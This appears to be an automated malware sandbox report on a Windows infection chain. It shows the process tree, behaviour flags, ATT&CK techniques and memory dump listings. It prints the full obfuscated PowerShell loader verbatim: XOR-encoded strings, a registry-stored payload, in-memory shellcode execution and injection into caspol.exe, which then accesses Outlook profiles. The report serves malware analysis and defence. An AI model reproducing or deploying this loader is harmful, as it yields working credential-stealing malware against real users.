La'DiCflCSr9MaEAv8El9Tl9BlAReBTr7Fi9NoEAk8Ob9HuCWi8DoDOu5suCIn8LeBTi3FlBSdBAc9Su1Fo9DeBIn9OvCHa8BlDPe8Br5CoCVa6DaBNoAFy9FlDRe8An6Gl9BeCTo8Om1Br8Se5Un8ErDEuCAa6enAmu1Li8St6Ge9GaCCa8LaDPr9RuAFl8As7Ti9Ne8FoBLoBMb8thDOp9TyAFn9GeESl8Gu1mi8FrBBo8ReDRu9VeBLeCar6ThABd5mo8Ev9Pa9moAVi9reBRu8In0Sk8Ob9Se8Va4InBCo5SuDGa2guDWi2AfAWoFLe8InDIn9WiCBiAheCGe8SuDSt8Ni4ta8SyDGe8ToFCo8Sc9Tr9ReCsc8foDSmAPaEUd8Fu7So9PoAbrAkeEWi9ElDBi8Sp6Ha8JoBSi9KiCSu8Ad1Re8Br7In8Un6HaBPo8by8Ba7So8Fu1La8Fo6Un9BuCSa8DeDMa9PoACoCFo0AfCMu0Ad8ReEEn8Se3Se9st8LiCTr8ViCIlCVo8Sk3un8Es3ReCSh8DiCHuCNeASaEAc9mi1Df9FlASp9fiAPo8UmDTi9paBUd8An3Fn8Kr7Ev9MoEFr8InDTm8Ra6Sa9HyBKdDAnCneCHe1AnCde4MeCUn8TiCUn0ReAEsFNoADiCOlBStCSuCKu8FiAle8TiCCo0ExBCu3ChARe1Am8In6Ba9ThCSpBFl8Be9FoCHe9FiAMaBDr5UdCFo4unCDe8PeBUn3boBMaDLaASt1Be8Do6Fo9DrCUnDkuBIlDUnATiBRe5AkCIn4LiCHa8OdBBe3opBSaDToANo1Br8Un6Ap9UnCBoDCaBreDGuADiBOm5InCNe4GaCBi8HyBSy3QuBMaDClAFe1Vi8Br6Sp9PsCThDReBAbDKaAAnBbr5DiCUr1SkCro8EmCNo0SkBMu3CoABo1se8Br6Lo9PaCBuBPo8Su9MeCFo9UnATaBBr5MeCRe1JoCTi1VeCil1Mi'Wi;Un&Wy(Gr`$ZrFTayairSvraleBlsSpkNooSkvMgeunnFosAn7Ta)He Rg`$EfZReoadoJamGtagrsRatNoiStgReiSanFoaAe6Op;La`$AnvKaaprrHe_JenLatNo Gl=Bo SefKukPrpFl Hr`$TrFVoyNorRerSneCeshakTioHevNoeBrnvesPs5Fo Wa`$OdFLoyEprGarPheInsGukOuoBrvMeeTrnLesPh6Mi;Uf`$MiZAvoUnoramDoaBrsLitOziPagKoiSonChaDe7Sn Un=Fo UnHVeTApBGe Su'CyCKvCLaBHe8Pi8Br7sp8Te4Pr8St9Te9BlARe8Al1Am9PeBTo8stDKl9caASu8Un1Re8In6Ps8StFFi8PeDaf9UlABrDTeBunCHo8boDWo5SlCSp8ReCSaCSk9UdELi8Ud9In9AfAFuBHi7Af9TwEUd8fo9UbCar6MoALe1Vi8Fe6Si9UgETo8Mi7Hj8Ri3En8AaDPrCRa0UnBfe3FjASc1Pa8Ph6Te9FoCKyBTh8Ov9coCSt9SeAgrBAs5svDAn2BiDRi2TiBSo2Un8PoDEp9BrAAf8So7suCPo4VaCDu8SaDPeBErDBeDTrDLaFEnCSo4EtCWi8UdDOn8Cl9ch0ReDSnBSpDsl8koDDr8OrDLn8efCKn4spCIn8SpDCh8Vr9No0LiDgeCHaDPa8ceCEm1Wa'Ex;Ul&Aa(Mo`$BaFAmyserTrrBreSesPlkCeostvEkeBjnSosCa7In)ve Du`$DrZPuoSkoDimUnaNosSttSaiCagOliMensuaRa7Pu;Pa`$IsZBeoJaoSemTiaInsOctmyiSkgtriFjnDiaVo8Bo Os=Co NoHQuTIsBUn De'AgCSmCbu8Te7Su9DaAap8Mo1BlCAn8TeDUn5InCme8PrChiCPo9CoEDr8Fa9Be9AlARoBEs7Ar9ReEre8Sp9OmCCa6FaASp1Ho8Fr6Ch9MaESq8Su7Gu8Bn3al8chDspCMi0DiBDe3HuACh1Su8Tr6Sn9SuCSkBSt8Pe9SaCLa9AnAMoBAv5RuDDi2tiDTo2GaBMe2sy8GeDCa9SvABr8Ph7RuCko4InCPe8ElDCh8Sh9Sc0EmDTr9UlDTy8TkDAb8ViDSu8HoDEb8CoDRh8LeCOv4MaCHy8WuDMi8Ra9Ca0TeDKoBDiDFo8TrDFa8TiDFu8DyCSk4UnCLo8BuDSe8So9Do0CoDCyCanCHo1Br'de;Em&Sp(Bl`$trFSkyKnrArrDeeTosVikFuoInviseSanSpsPr7Sm)Ce Gu`$CrZUnoOpoInmAzaBosMetKoiPugDaiAlnJuaBa8Ma;Ti`$UnKNoaCrlYtkFyeSlrNoeSitRe=Rh(deGCoeVitTh-MiIUvtKieFamstPSarFaopepBeeTorIntTeyPe Pa-RiPbaaBltExhCo Hn'WhHUnKVaCHiUAb:Re\KrMKooJolAneAfrReeUntBl5pr5Me\DeAEynStoRacKeoKacDicinyTigTaeAnaPolDo'Di)un.LeUPsnRerSlaSnvFiiPrnEngIl;Gr`$GoZFooLaoFomMaaFosSltFiiEqgNoiRenEmaSi9Vo al=Am SeHReTGlBAr Sp'ReCNaCPaBHy2Bl8Lg7Mi8Me7Tr8Al5An8Ap9Bl9OvBPo9PiCEk8Ea1mu8BaFTo8Pt1Je8Cs6Dr8Ly9ChCIn8KeDGe5EmCAn8SuBGy3HaBMnBAp9Br1Om9EfBGn9ouCWu8faDSt8Fl5ElCSe6coATiBFo8Br7Af8Ve6Ti9NeESh8UnDBr9NeABe9AlCVaBVa5UnDbe2OdDXy2AnASpEpl9DrAIn8Pr7Bo8In5FiAOuAOp8Fl9Cy9stBMa8EfDwoDGeEvaDBlCSkBDoBBe9RiCMi9hsAUn8Br1Sa8Ov6Tr8GoFBaCLe0BuCArCDiAEa3Ho8Po9au8Mu4Un8Ma3En8NoDCo9TuAUd8TjDEu9gaCSpCAm1Fo'Fo;Lu&is(he`$FlFUnyPrrexrDoelasOrkMeoDevHmefonBlsQu7Li)Ei Ba`$KuZFooEnoFemReaSpsUntCoiUdgSmiTrnInaBe9Co;La`$MuKReaSnlMokCoeSmrSoeEntSk0Pa Fo=Ko seHUnTsuBBa Bl'CoBSe3SkBUdBEx9Bi1Pl9NrBVi9MiCEp8ViDLa8kr5CoCKv6UmBBlAEv9TeDTm8Tr6Ra9KaCHm8Sy1ou8Be5Fo8StDReCId6StADd1At8Ho6Fy9ReCDi8laDUn9ChALe8ka7Sh9In8CoBFeBOr8GaDDe9SpABl9EfEAn8sk1Di8RaBLo8AuDTi9MaBFiCOx6DrAPi5La8Se9Tm9DaAGo9WeBCh8Jo0Be8Sk9Fo8Gy4DiBPr5buDBa2DaDDi2JuAYoBSv8Fo7Mi9Ca8Ar9Te1MeCIn0BaCUnCNeBSu2Ha8Sl7Cu8Mi7Un8Le5Ls8Di9Su9MiBBl9UnCVe8Hv1Tr8HoFFa8Ap1Qu8Ea6De8Te9SiCPo4FuCKr8haDby8UnCOn4BeCNo8PjCFo8weCFuCBiBTa8Sc8Ph7Lu8Co4Fa8Su9Pl9StATu8Fo1Ba9TrBCa8BlDma9LaAbe8Be1Dy8Sn6Be8GoFBa8OrDSi9RoAGuDUlBStCUp4FuCde8TrDMaBMiDMaDReDAfFteCRe1Be'Gr;Ti&Kn(Af`$EfFTyyTirSuruneRasfokSuocavYaeHanWhsVo7Pi)Ek Ch`$HyKAcaMelAfkBleFsrBeeSctJi0Ur;Re`$DesLiiAgzBleLo=Ri`$FlZLyoSyoTrmFeaHusUntAniUbgspiCanDeaAk.GlcSyoTruasnlotAn-vi3Ex5Tr7Tr;Sc`$SwKSeaMallakDaeAlrVoeudtSc1Mu Se=St CoHBhTudBLi ar'BaBFo3BeBNoBUn9Bd1Sa9OpBBe9GeCag8syDIn8ex5TrCPa6PrBUnASp9SeDEs8Bo6Ro9NeCFy8Ko1Sm8No5me8BrDLaCBl6RiAGe1Or8Bi6pe9gjCCl8GrDIm9LeATi8Re7Ce9Sw8NaBNeBUn8RuDRe9TrABo9WiEKa8Tr1no8JeBLn8DyDUn9SvBeuCSt6BrATa5No8No9Be9StACh9SnBCo8Pr0Sc8St9Dy8Zi4GlBGa5PaDCo2DaDha2haABrBFj8Ma7Iv9Ru8La9Ku1PrCCo0SiCBrCunBOv2Qu8Hj7Hv8Ka7Sl8In5Gu8To9Ma9MaBMe9JoCSa8Ho1wl8ShFSu8Ko1Ce8Di6im8Hu9DaCAs4HoCha8BaDSaBSiDRnDHeDOvFFaCan4ToCTu8UvCFnCOc8Ud7Do9BrAka8fo1BaCsl4TaCSu8SeCGlCGr9ClBAb8La1Bo9In2Ka8NoDFiCHe1Ra'Ba;Un&Ud(Di`$StFGryOfrKarPoeMosUnkGeoMevMaeIrnGesAs7Ed)Kn La`$naKAnaOvlInkWaeFrrSlepstSk1cl;fr`$DeKAlaTrlImkIneSqrBoeTrtGe2Pr Re=Na BeHAdTUtBSe su'huCReCTo9DaELe8Se9Ve9UmABaBDi7An9FaACo9SeDGa8Ka6Dr8Un5Sh8krDKrCCo8SpDBr5VgCGo8UnBas3beBFaBBa9Go1Sc9ShBCr9GgCHi8OvDPe8Wa5HyCSp6PeBToAJa9IsDNe8Mu6Co9UnCEl8Ar1Be8Re5In8HaDToCAl6TrATr1Re8Un6Pr9TrCIn8GoDUn9NoASh8Re7Un9ni8AlBUnBRo8MuDBa9DoARe9BaEUn8en1Ca8RoBKi8BrDgu9KoBBoCPe6WiAHa5Fl8Tt9Gr9trADe9avBco8Un0Un8Ta9Tr8In4MeBSo5MiDar2HeDGe2ReASkFSi8PuDDr9PrCBuABrCAd8UnDBr8Hy4Be8InDSt8ReFRe8No9Bu9YeCMo8alDMoALiESk8Fl7Ro9AdAUbAFoEDi9WhDOv8Op6Ca8TeBYe9PaCRe8Pa1Un8Sc7Fl8Un6OrBPa8Be8Sy7Aa8Tr1Vi8Ti6Ar9SiCGe8FoDpr9StAKeCFl0KrCFoCMiBPa8Me8Cy7Bg8Re4St8Da9Sc9JtAMu8Ba1Sl9CaBAr8VaDAc9RuAAv8Go1Yp8Ha6Ch8DdFFi8MoDFi9loABaDliBPrCUd4suCPo8FiCTa0ElAPrFBeAAdCOpBFeCBaCWu8OpAKv8DiCAs0ReBUd3BeAUn1Bl8Tr6Br9SaCSuBTa8Ud9CyCCh9ImAMeBBa5UnCOm4LeBKa3efAsy1Na8Ne6Vo9IsCDeBSk8Sq9PlCDe9prAmuBSu5trCPi1CeCUn8FoCDe0MaBWa3ApBPaEBr8De7Ud8Id1Co8PaCTaBMo5ChCAm1UnCSu1SaCco1Hj'Co;mo&Fo(Ti`$NaFCiyImrForPretisFikHyoStvlaeLanCesBr7Ca)Fr Ar`$PrKKuaBrlNokmueCarSieTotGe2Nu;Re`$woKUnaRelSekHaeCarVeeRotDe3Ti Da=Ch TrHFaTOuBEq Br'UlCHaCBl9DiEFr8Ma9br9FlAHuBNo7Ph9UnAta9DeDIl8il6Cy8tr5Se8OpDInCCh6ReAch1Ha8Ny6Sa9BlEBu8Su7bu8Ba3Pa8PoDSeCSt0FoCBaCTi8Mi7Fd9saAIm8Ru1NoCKo4TrCFlCKe9CaEsi8Ba9Fo9WiABeBPl7Bo8Od6Re9TaCLaCMo1Co'Re;cu&Vo(Al`$NoFTiySprElrSkeStsPukHooUnvLieDinVesfl7Va)Ko Tj`$ReKMaaPrlFdkskeAfrMoeBatTh3Sl#Fe;""";;Function Kalkeret9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Forskningsmiljer = $Forskningsmiljer + $HS.Substring($i, 1); } $Forskningsmiljer;}$Bogsamlerens0 = Kalkeret9 'DiISyEDuXFo ';$Bogsamlerens1= Kalkeret9 $Derri;if([IntPtr]::size -eq 8){ start-job { param($a) powershell $a } -RunAs32 -Argument $Bogsamlerens1 | wait-job | Receive-Job;}else{ & ($Bogsamlerens0) $Bogsamlerens1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 232); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Inthrall0=HTB 'BB919B9C8D85C68C8484';$Inthrall1=HTB 'A5818B9A879B878E9CC6BF8186DBDAC6BD869B898E8DA6899C819E8DA58D9C80878C9B';$Inthrall2=HTB 'AF8D9CB89A878BA98C8C9A8D9B9B';$Inthrall3=HTB 'BB919B9C8D85C6BA9D869C81858DC6A1869C8D9A8798BB8D9A9E818B8D9BC6A089868C848DBA8D8E';$Inthrall4=HTB '9B9C9A81868F';$Inthrall5=HTB 'AF8D9CA5878C9D848DA089868C848D';$Inthrall6=HTB 'BABCBB988D8B818984A689858DC4C8A0818C8DAA91BB818FC4C8B89D8A84818B';$Inthrall7=HTB 'BA9D869C81858DC4C8A58986898F8D8C';$Inthrall8=HTB 'BA8D8E848D8B9C8D8CAC8D848D8F899C8D';$Inthrall9=HTB 'A186A58D85879A91A5878C9D848D';$Fyrreskovens0=HTB 'A591AC8D848D8F899C8DBC91988D';$Fyrreskovens1=HTB 'AB84899B9BC4C8B89D8A84818BC4C8BB8D89848D8CC4C8A9869B81AB84899B9BC4C8A99D9C87AB84899B9B';$Fyrreskovens2=HTB 'A1869E87838D';$Fyrreskovens3=HTB 'B89D8A84818BC4C8A0818C8DAA91BB818FC4C8A68D9FBB84879CC4C8BE819A9C9D8984';$Fyrreskovens4=HTB 'BE819A9C9D8984A98484878B';$Fyrreskovens5=HTB '869C8C8484';$Fyrreskovens6=HTB 'A69CB89A879C8D8B9CBE819A9C9D8984A58D85879A91';$Fyrreskovens7=HTB 'A1ADB0';$Fyrreskovens8=HTB 'B4';function fkp {Param ($v_m, $v_p) ;$Zoomastigina0 =HTB 'CC9E9D8685C8D5C8C0B3A99898AC8785898186B5D2D2AB9D9A9A8D869CAC8785898186C6AF8D9CA99B9B8D858A84818D9BC0C1C894C8BF808D9A8DC5A78A828D8B9CC893C8CCB7C6AF84878A8984A99B9B8D858A8491AB898B808DC8C5A9868CC8CCB7C6A4878B899C818786C6BB9884819CC0CCAE919A9A8D9B83879E8D869BD0C1B3C5D9B5C6AD999D89849BC0CCA1869C809A898484D8C1C895C1C6AF8D9CBC91988DC0CCA1869C809A898484D9C1';&($Fyrreskovens7) $Zoomastigina0;$Zoomastigina5 = HTB 'CC9E899AB78F9889C8D5C8CC9E9D8685C6AF8D9CA58D9C80878CC0CCA1869C809A898484DAC4C8B3BC91988DB3B5B5C8A8C0CCA1869C809A898484DBC4C8CCA1869C809A898484DCC1C1';&($Fyrreskovens7) $Zoomastigina5;$Zoomastigina1 = HTB '9A8D9C9D9A86C8CC9E899AB78F9889C6A1869E87838DC0CC869D8484C4C8A8C0B3BB919B9C8D85C6BA9D869C81858DC6A1869C8D9A8798BB8D9A9E818B8D9BC6A089868C848DBA8D8EB5C0A68D9FC5A78A828D8B9CC8BB919B9C8D85C6BA9D869C81858DC6A1869C8D9A8798BB8D9A9E818B8D9BC6A089868C848DBA8D8EC0C0A68D9FC5A78A828D8B9CC8A1869CB89C9AC1C4C8C0CC9E9D8685C6AF8D9CA58D9C80878CC0CCA1869C809A898484DDC1C1C6A1869E87838DC0CC869D8484C4C8A8C0CC9EB785C1C1C1C1C4C8CC9EB798C1C1';&($Fyrreskovens7) $Zoomastigina1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Zoomastigina2 = HTB 'CCBEBCAAC8D5C8B3A99898AC8785898186B5D2D2AB9D9A9A8D869CAC8785898186C6AC8D8E81868DAC91868985818BA99B9B8D858A8491C0C0A68D9FC5A78A828D8B9CC8BB919B9C8D85C6BA8D8E848D8B9C818786C6A99B9B8D858A8491A689858DC0CCA1869C809A898484D0C1C1C4C8B3BB919B9C8D85C6BA8D8E848D8B9C818786C6AD85819CC6A99B9B8D858A8491AA9D81848C8D9AA98B8B8D9B9BB5D2D2BA9D86C1C6AC8D8E81868DAC91868985818BA5878C9D848DC0CCA1869C809A898484D1C4C8CC8E89849B8DC1C6AC8D8E81868DBC91988DC0CCAE919A9A8D9B83879E8D869BD8C4C8CCAE919A9A8D9B83879E8D869BD9C4C8B3BB919B9C8D85C6A59D849C818B899B9CAC8D848D8F899C8DB5C1';&($Fyrreskovens7) $Zoomastigina2;$Zoomastigina3 = HTB 'CCBEBCAAC6AC8D8E81868DAB87869B9C9A9D8B9C879AC0CCA1869C809A898484DEC4C8B3BB919B9C8D85C6BA8D8E848D8B9C818786C6AB89848481868FAB87869E8D869C8187869BB5D2D2BB9C89868C899A8CC4C8CC9E899AB798899A89858D9C8D9A9BC1C6BB8D9CA18598848D858D869C899C818786AE84898F9BC0CCA1869C809A898484DFC1';&($Fyrreskovens7) $Zoomastigina3;$Zoomastigina4 = HTB 'CCBEBCAAC6AC8D8E81868DA58D9C80878CC0CCAE919A9A8D9B83879E8D869BDAC4C8CCAE919A9A8D9B83879E8D869BDBC4C8CC9E9A9CC4C8CC9E899AB798899A89858D9C8D9A9BC1C6BB8D9CA18598848D858D869C899C818786AE84898F9BC0CCA1869C809A898484DFC1';&($Fyrreskovens7) $Zoomastigina4;$Zoomastigina5 = HTB '9A8D9C9D9A86C8CCBEBCAAC6AB9A8D899C8DBC91988DC0C1';&($Fyrreskovens7) $Zoomastigina5 ;}$kk = HTB '838D9A868D84DBDA';$Zoomastigina6 = HTB 'CC9E899AB79E89C8D5C8B3BB919B9C8D85C6BA9D869C81858DC6A1869C8D9A8798BB8D9A9E818B8D9BC6A5899A9B808984B5D2D2AF8D9CAC8D848D8F899C8DAE879AAE9D868B9C818786B88781869C8D9AC0C08E8398C8CC8383C8CCAE919A9A8D9B83879E8D869BDCC1C4C8C0AFACBCC8A8C0B3A1869CB89C9AB5C4C8B3BDA1869CDBDAB5C4C8B3BDA1869CDBDAB5C4C8B3BDA1869CDBDAB5C1C8C0B3A1869CB89C9AB5C1C1C1';&($Fyrreskovens7) $Zoomastigina6;$var_nt = fkp $Fyrreskovens5 $Fyrreskovens6;$Zoomastigina7 = HTB 'CCB88784899A819B8D9A81868F8D9ADBC8D5C8CC9E899AB79E89C6A1869E87838DC0B3A1869CB89C9AB5D2D2B28D9A87C4C8DBDDDFC4C8D890DBD8D8D8C4C8D890DCD8C1';&($Fyrreskovens7) $Zoomastigina7;$Zoomastigina8 = HTB 'CC879A81C8D5C8CC9E899AB79E89C6A1869E87838DC0B3A1869CB89C9AB5D2D2B28D9A87C4C8D890D9D8D8D8D8D8C4C8D890DBD8D8D8C4C8D890DCC1';&($Fyrreskovens7) $Zoomastigina8;$Kalkeret=(Get-ItemProperty -Path 'HKCU:\Moleret55\Anococcygeal').Unraving;$Zoomastigina9 = HTB 'CCB2878785899B9C818F818689C8D5C8B3BB919B9C8D85C6AB87869E8D9A9CB5D2D2AE9A8785AA899B8DDEDCBB9C9A81868FC0CCA38984838D9A8D9CC1';&($Fyrreskovens7) $Zoomastigina9;$Kalkeret0 = HTB 'B3BB919B9C8D85C6BA9D869C81858DC6A1869C8D9A8798BB8D9A9E818B8D9BC6A5899A9B808984B5D2D2AB879891C0CCB2878785899B9C818F818689C4C8D8C4C8C8CCB88784899A819B8D9A81868F8D9ADBC4C8DBDDDFC1';&($Fyrreskovens7) $Kalkeret0;$size=$Zoomastigina.count-357;$Kalkeret1 = HTB 'B3BB919B9C8D85C6BA9D869C81858DC6A1869C8D9A8798BB8D9A9E818B8D9BC6A5899A9B808984B5D2D2AB879891C0CCB2878785899B9C818F818689C4C8DBDDDFC4C8CC879A81C4C8CC9B81928DC1';&($Fyrreskovens7) $Kalkeret1;$Kalkeret2 = HTB 'CC9E899AB79A9D86858DC8D5C8B3BB919B9C8D85C6BA9D869C81858DC6A1869C8D9A8798BB8D9A9E818B8D9BC6A5899A9B808984B5D2D2AF8D9CAC8D848D8F899C8DAE879AAE9D868B9C818786B88781869C8D9AC0CCB88784899A819B8D9A81868F8D9ADBC4C8C0AFACBCC8A8C0B3A1869CB89C9AB5C4B3A1869CB89C9AB5C1C8C0B3BE87818CB5C1C1C1';&($Fyrreskovens7) $Kalkeret2;$Kalkeret3 = HTB 'CC9E899AB79A9D86858DC6A1869E87838DC0CC879A81C4CC9E899AB7869CC1';&($Fyrreskovens7) $Kalkeret3#"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1236

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
5⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:832

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
83fdc6de7c4b14e2b16d4ede7ec005ba

SHA1
51d1fab65c60223da1c5fe90f78d65c24a01040e

SHA256
5c4ed00f19933339d411ca5bbdeb212b84721f6d4454bc9ccc988575153dae7f

SHA512
db736bd40599ba21a8a92d78da1c9ed021cd7033df1ef31c123b1edebd187962aad9a2961dab3402ec0831ec0706e6a0852d3606b67801d90fbb68e7490fe46e

Download Submit
memory/832-91-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/832-89-0x0000000000401000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/832-88-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/832-87-0x0000000077160000-0x0000000077309000-memory.dmp

Filesize
1.7MB

Download
memory/832-83-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/832-80-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/832-76-0x000000000090768E-mapping.dmp

Download
memory/1072-71-0x00000000731A0000-0x000000007374B000-memory.dmp

Filesize
5.7MB

Download
memory/1072-61-0x0000000000000000-mapping.dmp

Download
memory/1072-62-0x0000000074DC1000-0x0000000074DC3000-memory.dmp

Filesize
8KB

Download
memory/1072-63-0x00000000731A0000-0x000000007374B000-memory.dmp

Filesize
5.7MB

Download
memory/1236-72-0x00000000731A0000-0x000000007374B000-memory.dmp

Filesize
5.7MB

Download
memory/1236-79-0x0000000077340000-0x00000000774C0000-memory.dmp

Filesize
1.5MB

Download
memory/1236-93-0x0000000077340000-0x00000000774C0000-memory.dmp

Filesize
1.5MB

Download
memory/1236-68-0x0000000005B80000-0x0000000005C80000-memory.dmp

Filesize
1024KB

Download
memory/1236-92-0x0000000005B80000-0x0000000005C80000-memory.dmp

Filesize
1024KB

Download
memory/1236-73-0x0000000005B80000-0x0000000005C80000-memory.dmp

Filesize
1024KB

Download
memory/1236-67-0x00000000731A0000-0x000000007374B000-memory.dmp

Filesize
5.7MB

Download
memory/1236-77-0x0000000077160000-0x0000000077309000-memory.dmp

Filesize
1.7MB

Download
memory/1236-78-0x0000000077340000-0x00000000774C0000-memory.dmp

Filesize
1.5MB

Download
memory/1236-82-0x0000000077340000-0x00000000774C0000-memory.dmp

Filesize
1.5MB

Download
memory/1236-64-0x0000000000000000-mapping.dmp

Download
memory/1236-81-0x0000000077340000-0x00000000774C0000-memory.dmp

Filesize
1.5MB

Download
memory/1416-54-0x000007FEFB9E1000-0x000007FEFB9E3000-memory.dmp

Filesize
8KB

Download
memory/1788-69-0x00000000026F4000-0x00000000026F7000-memory.dmp

Filesize
12KB

Download
memory/1788-60-0x00000000026FB000-0x000000000271A000-memory.dmp

Filesize
124KB

Download
memory/1788-59-0x00000000026F4000-0x00000000026F7000-memory.dmp

Filesize
12KB

Download
memory/1788-58-0x000007FEF34A0000-0x000007FEF3FFD000-memory.dmp

Filesize
11.4MB

Download
memory/1788-57-0x000007FEF4000000-0x000007FEF4A23000-memory.dmp

Filesize
10.1MB

Download
memory/1788-55-0x0000000000000000-mapping.dmp

Download
memory/1788-70-0x00000000026FB000-0x000000000271A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads